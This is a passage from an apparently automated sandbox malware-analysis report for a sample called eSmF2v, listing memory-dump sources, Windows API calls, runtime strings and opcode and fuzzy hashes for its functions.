                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: FileInfoSleepStartupType
                      • String ID:
                      • API String ID: 1527402494-0
                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                      • String ID:
                      • API String ID: 3078728599-0
                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                      • String ID:
                      • API String ID: 1850339568-0
                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: _set_statfp
                      • String ID:
                      • API String ID: 1156100317-0
                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                      • Instruction ID: d5cf708460691a1242ea4ec4320e550fbca86d39aa3af920d4ea24d683478602
                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                      • Instruction Fuzzy Hash: F61128BAF58A1B01F75811ECE56E37D2B416F9D3F4F944634EB6F066DE8E2C68414201
                      APIs
                      • FlsGetValue.KERNEL32(?,?,?,00007FF8BFB2766F,?,?,00000000,00007FF8BFB2790A,?,?,?,?,?,00007FF8BFB27896), ref: 00007FF8BFB296A3
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB2766F,?,?,00000000,00007FF8BFB2790A,?,?,?,?,?,00007FF8BFB27896), ref: 00007FF8BFB296C2
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB2766F,?,?,00000000,00007FF8BFB2790A,?,?,?,?,?,00007FF8BFB27896), ref: 00007FF8BFB296EA
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB2766F,?,?,00000000,00007FF8BFB2790A,?,?,?,?,?,00007FF8BFB27896), ref: 00007FF8BFB296FB
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB2766F,?,?,00000000,00007FF8BFB2790A,?,?,?,?,?,00007FF8BFB27896), ref: 00007FF8BFB2970C
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                      • Instruction ID: 66c9fda514068b8a3b31397d0c03a115e0fb4e0a96f9ba438d41cdc9786ddaa3
                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                      • Instruction Fuzzy Hash: 75115120F0C64B46FA5967AD696117D6B815F447F0FD44339EB3D066D6EF2CE4419200
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                      • Instruction ID: e52f45e498023c82634b2106a2cec2dce669647dda8663d358ae2dcffc010c57
                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                      • Instruction Fuzzy Hash: 7811E554B4D60B4AFA68A7ED546217D2B814F453F0FD84739DB3E0A2DAEE2CF442A601
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CallEncodePointerTranslator
                      • String ID: MOC$RCC
                      • API String ID: 3544855599-2084237596
                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                      • Instruction ID: d6ae1708dbcce8340218c442116569c3a44809b5756db2583d54e86b74d2040c
                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                      • Instruction Fuzzy Hash: 36919E73A087858AE711CFA8E8406AD7BA0FB447C8F54513AEB8D57B55DF38D1A6CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                      • String ID: csm
                      • API String ID: 2395640692-1018135373
                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                      • Instruction ID: 1abe78c34c2360aee68bd4f7926278648669f7877467543bf8999ca5333d6228
                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                      • Instruction Fuzzy Hash: 3F51AF36B196428ADB148F5DE448A7DBB91EB44BD8F988131DB8A43788DF7DE851C700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                      • String ID: csm$csm
                      • API String ID: 3896166516-3733052814
                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                      • Instruction ID: 9b93e8b8570397fd63c9c4f0fef4ba69425b4b5330020729569b3e43d2a8625d
                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                      • Instruction Fuzzy Hash: 2A51AF36A083828AEB648F999488B7C7BA0FB45BC4F986135DB8D47B85CF3CE451C701
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CallEncodePointerTranslator
                      • String ID: MOC$RCC
                      • API String ID: 3544855599-2084237596
                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                      • Instruction ID: df4c304eb41a279e369bf0d9e83586339f72e55330f61f6e98ff3eb942f3e877
                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                      • Instruction Fuzzy Hash: 5F619F32918BC581E7209B59E4407AEBBA0FB85BD4F545235EB9D47B99CF7CE190CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressHandleLoadModuleProc
                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                      • API String ID: 3055805555-3733552308
                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Process$CurrentSizeWorking
                      • String ID: Shrinking process size
                      • API String ID: 2122760700-652428428
                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$Enter$Leave
                      • String ID:
                      • API String ID: 2801635615-0
                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: FileWrite$ConsoleErrorLastOutput
                      • String ID:
                      • API String ID: 2718003287-0
                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                      • Instruction ID: 9f5d1ad05f4bcd4de1bf1f03649ae51678ece54d0a8f50d1ac94efc1c84a4080
                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                      • Instruction Fuzzy Hash: 0FD1A032B19A8189E711CFAAD4502EC3BB1FB447D8B944236DF9D9BB99DE38D406C740
                      APIs
                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFB2ED07), ref: 00007FF8BFB2EE38
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFB2ED07), ref: 00007FF8BFB2EEC3
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ConsoleErrorLastMode
                      • String ID:
                      • API String ID: 953036326-0
                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                      • Instruction ID: 9c2efb8ffb97899e938ecada8b84816e1443f4335f906a28f8f4934b149a7741
                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                      • Instruction Fuzzy Hash: FC919F62B1865285F7609FAE94802BD2FA0BB04BD8F944139DF4E67A95DF38D486C700
                      APIs
                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalEventSection$EnterLeaveReset
                      • String ID:
                      • API String ID: 3553466030-0
                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalEventSection$EnterLeaveReset
                      • String ID:
                      • API String ID: 3553466030-0
                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                      • String ID:
                      • API String ID: 2933794660-0
                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                      • Instruction ID: 9436c4628d9bd5ff8ae1a17d2b9acdc66efb0a629747944d8298dfa0d695c93d
                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                      • Instruction Fuzzy Hash: D7111C26B94B058AEB00CBA4E8552A833A4F759B98F440E31DB6D86BA4DF78D169C340
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CreateEvent$CriticalInitializeSection
                      • String ID:
                      • API String ID: 926662266-0
                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: __except_validate_context_record
                      • String ID: csm$csm
                      • API String ID: 1467352782-3733052814
                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                      • Instruction ID: d2e1c4e71e67c5eeff22e724c29d346ee9879480e90e9988b0ddef1714018e90
                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                      • Instruction Fuzzy Hash: ED719032A086818ADB609FA9D544BBD7FA0FB44BC4F94A135DF8C47A89CF2CD451C741
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CreateFrameInfo__except_validate_context_record
                      • String ID: csm
                      • API String ID: 2558813199-1018135373
                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                      • Instruction ID: e8c4058e1e7fd27c4fcf8eaa1b18739c4ffc739a6c8947f41d15821686028e26
                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                      • Instruction Fuzzy Hash: DD513F3761974196E620EF99E44026EBBA4FB89BD0F540539EB8D07B55CF3CE461CB40
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
